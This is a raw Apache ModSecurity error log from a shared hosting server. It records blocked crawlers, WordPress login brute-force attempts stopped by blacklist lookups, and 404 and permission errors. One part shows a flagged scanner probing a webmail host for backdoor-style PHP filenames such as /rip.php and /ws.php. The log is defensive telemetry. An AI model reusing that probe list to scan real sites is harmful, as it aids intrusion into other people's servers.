[Tue May 26 20:07:13.794651 2026] [security2:error] [pid 112029:tid 112277] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWwGaFW0C-ajaCsyFdR1gAAAYA"]
[Tue May 26 20:07:14.353746 2026] [security2:error] [pid 113091:tid 113337] [client 47.128.124.19:39336] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "siliconelevators.in"] [uri "/robots.txt"] [unique_id "ahWwGqPxBGSmlFNOy6pj1wAAAog"]
[Tue May 26 20:07:14.617615 2026] [security2:error] [pid 113091:tid 113264] [client 66.249.64.109:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWwGqPxBGSmlFNOy6pj4wAAAj8"]
[Tue May 26 20:07:14.617979 2026] [security2:error] [pid 113091:tid 113260] [client 66.249.64.109:43570] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWwGqPxBGSmlFNOy6pj4gAAAjs"]
[Tue May 26 20:07:14.816857 2026] [fcgid:warn] [pid 113091:tid 113275] (70014)End of file found: [client 66.132.172.208:29838] mod_fcgid: can't get data from http client
[Tue May 26 20:07:15.410602 2026] [security2:error] [pid 112029:tid 112096] [remote 45.13.190.75:35826] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 75.190.13.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahWwG6FW0C-ajaCsyFdR_gABKUI"], referer: https://bosscoirs.com/wp-login.php
[Tue May 26 20:07:15.957443 2026] [security2:error] [pid 113091:tid 113304] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWwG6PxBGSmlFNOy6pkCgAAAmc"]
[Tue May 26 20:07:16.708826 2026] [security2:error] [pid 113091:tid 113262] [client 134.209.28.66:59286] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahWwHKPxBGSmlFNOy6pkKwAAAj0"], referer: https://www.blog.jhonweb.com/
[Tue May 26 20:07:16.964806 2026] [autoindex:error] [pid 113091:tid 113274] [client 66.132.172.208:29870] AH01276: Cannot serve directory /home1/omshriin/public_html/omshriinfra.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 20:07:19.776086 2026] [security2:error] [pid 113091:tid 113245] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWwH6PxBGSmlFNOy6pkmAAAAiw"]
[Tue May 26 20:07:20.833817 2026] [security2:error] [pid 113091:tid 113348] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWwIKPxBGSmlFNOy6pkyQAAApM"]
[Tue May 26 20:07:23.653313 2026] [security2:error] [pid 113091:tid 113347] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWwI6PxBGSmlFNOy6plIAAAApI"]
[Tue May 26 20:07:26.104911 2026] [security2:error] [pid 113091:tid 113202] [remote 162.214.184.71:57114] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.184.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWwJaPxBGSmlFNOy6plcAACc24"]
[Tue May 26 20:07:26.234248 2026] [security2:error] [pid 113091:tid 113225] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWwJaPxBGSmlFNOy6plaAAAAhg"]
[Tue May 26 20:07:27.483944 2026] [security2:error] [pid 113091:tid 113116] [remote 4.194.248.64:34270] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 64.248.194.4.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWwJ6PxBGSmlFNOy6pllgACKBg"]
[Tue May 26 20:07:28.092583 2026] [security2:error] [pid 113091:tid 113275] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWwJ6PxBGSmlFNOy6plngAAAko"]
[Tue May 26 20:07:29.233301 2026] [security2:error] [pid 113091:tid 113148] [remote 162.214.184.71:57114] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.184.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWwKaPxBGSmlFNOy6pl4QACcTg"], referer: https://anujtradingco.com/wp-login.php
[Tue May 26 20:07:30.564918 2026] [security2:error] [pid 113091:tid 113133] [remote 82.196.25.136:44482] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 136.25.196.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahWwKqPxBGSmlFNOy6pmEwACYik"]
[Tue May 26 20:07:31.108530 2026] [security2:error] [pid 112029:tid 112271] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWwKqFW0C-ajaCsyFdS_wAAAXo"]
[Tue May 26 20:07:32.392184 2026] [security2:error] [pid 113091:tid 113143] [remote 52.66.96.197:49086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 197.96.66.52.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWwLKPxBGSmlFNOy6pmYwACOTM"]
[Tue May 26 20:07:32.482050 2026] [security2:error] [pid 113091:tid 113227] [client 113.164.192.186:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWwLKPxBGSmlFNOy6pmXgAAAho"]
[Tue May 26 20:07:32.923386 2026] [security2:error] [pid 113091:tid 113138] [remote 52.66.96.197:49086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 197.96.66.52.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWwLKPxBGSmlFNOy6pmcQACJi4"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 20:07:33.070333 2026] [security2:error] [pid 112029:tid 112210] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWwLKFW0C-ajaCsyFdTIQAAAT0"]
[Tue May 26 20:07:33.150647 2026] [security2:error] [pid 113091:tid 113246] [client 114.119.139.115:49981] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/glorod_new/index.php"] [unique_id "ahWwLaPxBGSmlFNOy6pmeAAAAi0"], referer: http://glorodavionics.com/glorod_new/index.php?route=checkout/cart
[Tue May 26 20:07:33.252257 2026] [security2:error] [pid 112029:tid 112155] [remote 213.171.208.232:42164] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.208.171.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "nicmaperu.com"] [uri "/wp-login.php"] [unique_id "ahWwLaFW0C-ajaCsyFdTMQABT30"]
[Tue May 26 20:07:34.904609 2026] [security2:error] [pid 112029:tid 112277] [client 114.119.139.118:47811] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "samayikprasanga.in"] [uri "/robots.txt"] [unique_id "ahWwLqFW0C-ajaCsyFdTZgAAAYA"]
[Tue May 26 20:07:35.488187 2026] [security2:error] [pid 112029:tid 112176] [client 45.131.193.13:60343] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.193.131.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rmbtsbd.com"] [uri "/wp-login.php"] [unique_id "ahWwL6FW0C-ajaCsyFdTcQAAARs"]
[Tue May 26 20:07:36.124978 2026] [security2:error] [pid 113091:tid 113277] [client 14.191.171.247:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "avprealty.com"] [uri "/index.php"] [unique_id "ahWwLqPxBGSmlFNOy6pmpgAAAkw"]
[Tue May 26 20:07:36.224662 2026] [security2:error] [pid 112029:tid 112185] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWwL6FW0C-ajaCsyFdTfQAAASQ"]
[Tue May 26 20:07:38.005782 2026] [fcgid:warn] [pid 112029:tid 112216] (70014)End of file found: [client 45.33.109.8:44174] mod_fcgid: can't get data from http client
[Tue May 26 20:07:38.410905 2026] [security2:error] [pid 112029:tid 112074] [remote 121.200.216.55:38372] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWwMqFW0C-ajaCsyFdTuQABMSw"]
[Tue May 26 20:07:38.827319 2026] [security2:error] [pid 112029:tid 112168] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWwMqFW0C-ajaCsyFdTvgAAARM"]
[Tue May 26 20:07:40.267982 2026] [core:crit] [pid 112029:tid 112251] (13)Permission denied: [client 207.46.13.7:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 20:07:40.568185 2026] [security2:error] [pid 112029:tid 112216] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWwNKFW0C-ajaCsyFdT-wAAAUM"]
[Tue May 26 20:07:40.671767 2026] [core:crit] [pid 112029:tid 112258] (13)Permission denied: [client 207.46.13.7:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 20:07:41.988710 2026] [core:crit] [pid 112029:tid 112266] (13)Permission denied: [client 207.46.13.7:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 20:07:42.099762 2026] [security2:error] [pid 112029:tid 112277] [client 4.205.23.164:7745] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.23.205.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.bhavisharchitects.com"] [uri "/wk/index.php"] [unique_id "ahWwNqFW0C-ajaCsyFdUWQAAAYA"]
[Tue May 26 20:07:42.935691 2026] [security2:error] [pid 112029:tid 112200] [client 4.205.23.164:7682] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.23.205.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.bhavisharchitects.com"] [uri "/inputs.php"] [unique_id "ahWwNqFW0C-ajaCsyFdUhQAAATM"]
[Tue May 26 20:07:43.460831 2026] [security2:error] [pid 113091:tid 113318] [client 66.249.88.72:64357] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahWwN6PxBGSmlFNOy6pnNwAAAnU"]
[Tue May 26 20:07:43.621460 2026] [security2:error] [pid 112029:tid 112286] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWwN6FW0C-ajaCsyFdUjQAAAYk"]
[Tue May 26 20:07:45.255040 2026] [security2:error] [pid 113091:tid 113294] [client 4.205.23.164:7798] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.23.205.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.bhavisharchitects.com"] [uri "/ioxi-o.php"] [unique_id "ahWwOaPxBGSmlFNOy6pncAAAAl0"]
[Tue May 26 20:07:45.576169 2026] [security2:error] [pid 113091:tid 113300] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWwOaPxBGSmlFNOy6pnbgAAAmM"]
[Tue May 26 20:07:46.222579 2026] [security2:error] [pid 112029:tid 112285] [client 4.205.23.164:7766] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.23.205.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.bhavisharchitects.com"] [uri "/function/function.php"] [unique_id "ahWwOqFW0C-ajaCsyFdU3QAAAYg"]
[Tue May 26 20:07:47.949152 2026] [security2:error] [pid 112029:tid 112222] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWwO6FW0C-ajaCsyFdVDwAAAUk"]
[Tue May 26 20:07:48.101751 2026] [core:crit] [pid 113091:tid 113306] (13)Permission denied: [client 40.77.167.63:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 20:07:48.205466 2026] [security2:error] [pid 112029:tid 112181] [client 4.205.23.164:8293] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.23.205.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.bhavisharchitects.com"] [uri "/rip.php"] [unique_id "ahWwPKFW0C-ajaCsyFdVLAAAASA"]
[Tue May 26 20:07:48.370951 2026] [ssl:error] [pid 112029:tid 112075] [remote 45.236.45.102:50650] AH02032: Hostname blog.jhonweb.com provided via SNI and hostname www.jhonweb.com provided via HTTP have no compatible SSL setup for policy 'secure', referer: https://blog.jhonweb.com/
[Tue May 26 20:07:48.765482 2026] [security2:error] [pid 113091:tid 113301] [client 4.205.23.164:8262] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.23.205.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.bhavisharchitects.com"] [uri "/admin.php"] [unique_id "ahWwPKPxBGSmlFNOy6pn4gAAAmQ"]
[Tue May 26 20:07:49.830292 2026] [security2:error] [pid 113091:tid 113333] [client 4.205.23.164:8286] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.23.205.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.bhavisharchitects.com"] [uri "/wp-content/uploads/index.php"] [unique_id "ahWwPaPxBGSmlFNOy6poEwAAAoQ"]
[Tue May 26 20:07:50.046607 2026] [security2:error] [pid 112029:tid 112164] [client 162.211.125.6:15220] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 6.125.211.162.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/index3.php"] [unique_id "ahWwPaFW0C-ajaCsyFdVYAAAAQ8"]
[Tue May 26 20:07:50.046741 2026] [security2:error] [pid 112029:tid 112164] [client 162.211.125.6:15220] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "409"] [hostname "samayikprasanga.in"] [uri "/index3.php"] [unique_id "ahWwPaFW0C-ajaCsyFdVYAAAAQ8"]
[Tue May 26 20:07:50.402212 2026] [security2:error] [pid 113091:tid 113250] [client 4.205.23.164:8285] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.23.205.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.bhavisharchitects.com"] [uri "/cache.php"] [unique_id "ahWwPqPxBGSmlFNOy6poHwAAAjE"]
[Tue May 26 20:07:51.493372 2026] [security2:error] [pid 112029:tid 112249] [client 34.195.212.30:22136] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahWwP6FW0C-ajaCsyFdVigAAAWQ"]
[Tue May 26 20:07:51.649760 2026] [security2:error] [pid 113091:tid 113224] [client 4.205.23.164:8275] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.23.205.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.bhavisharchitects.com"] [uri "/themes.php"] [unique_id "ahWwP6PxBGSmlFNOy6poRQAAAhc"]
[Tue May 26 20:07:51.694050 2026] [security2:error] [pid 113091:tid 113237] [client 34.195.212.30:23714] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahWwP6PxBGSmlFNOy6poRgAAAiQ"]
[Tue May 26 20:07:51.838173 2026] [security2:error] [pid 113091:tid 113200] [remote 173.252.69.43:61198] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 43.69.252.173.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ecosol.plus"] [uri "/esplus/usuarios/registro.php"] [unique_id "ahWwP6PxBGSmlFNOy6poSwACgGw"]
[Tue May 26 20:07:52.064319 2026] [security2:error] [pid 113091:tid 113334] [client 34.195.212.30:23730] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.samayikprasanga.in"] [uri "/"] [unique_id "ahWwQKPxBGSmlFNOy6poVgAAAoU"]
[Tue May 26 20:07:52.242704 2026] [security2:error] [pid 112029:tid 112114] [remote 54.38.29.86:57386] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.29.38.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWwQKFW0C-ajaCsyFdVoAABHFQ"]
[Tue May 26 20:07:52.877759 2026] [security2:error] [pid 113091:tid 113230] [client 4.205.23.164:8276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.23.205.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.bhavisharchitects.com"] [uri "/an.php"] [unique_id "ahWwQKPxBGSmlFNOy6pocQAAAh0"]
[Tue May 26 20:07:53.508444 2026] [security2:error] [pid 112029:tid 112274] [client 4.205.23.164:8227] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.23.205.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.bhavisharchitects.com"] [uri "/index/function.php"] [unique_id "ahWwQaFW0C-ajaCsyFdV2AAAAX0"]
[Tue May 26 20:07:53.529491 2026] [security2:error] [pid 113091:tid 113268] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWwQaPxBGSmlFNOy6poeAAAAkM"]
[Tue May 26 20:07:53.619245 2026] [security2:error] [pid 112029:tid 112173] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWwQaFW0C-ajaCsyFdVwgAAARg"]
[Tue May 26 20:07:54.932372 2026] [security2:error] [pid 112029:tid 112183] [client 4.205.23.164:8318] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.23.205.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.bhavisharchitects.com"] [uri "/ws.php"] [unique_id "ahWwQqFW0C-ajaCsyFdWBAAAASI"]
[Tue May 26 20:07:55.817545 2026] [security2:error] [pid 113091:tid 113230] [client 4.205.23.164:8272] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.23.205.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.bhavisharchitects.com"] [uri "/404.php"] [unique_id "ahWwQ6PxBGSmlFNOy6poowAAAh0"]
[Tue May 26 20:07:55.959362 2026] [security2:error] [pid 112029:tid 112266] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWwQ6FW0C-ajaCsyFdWHgAAAXU"]
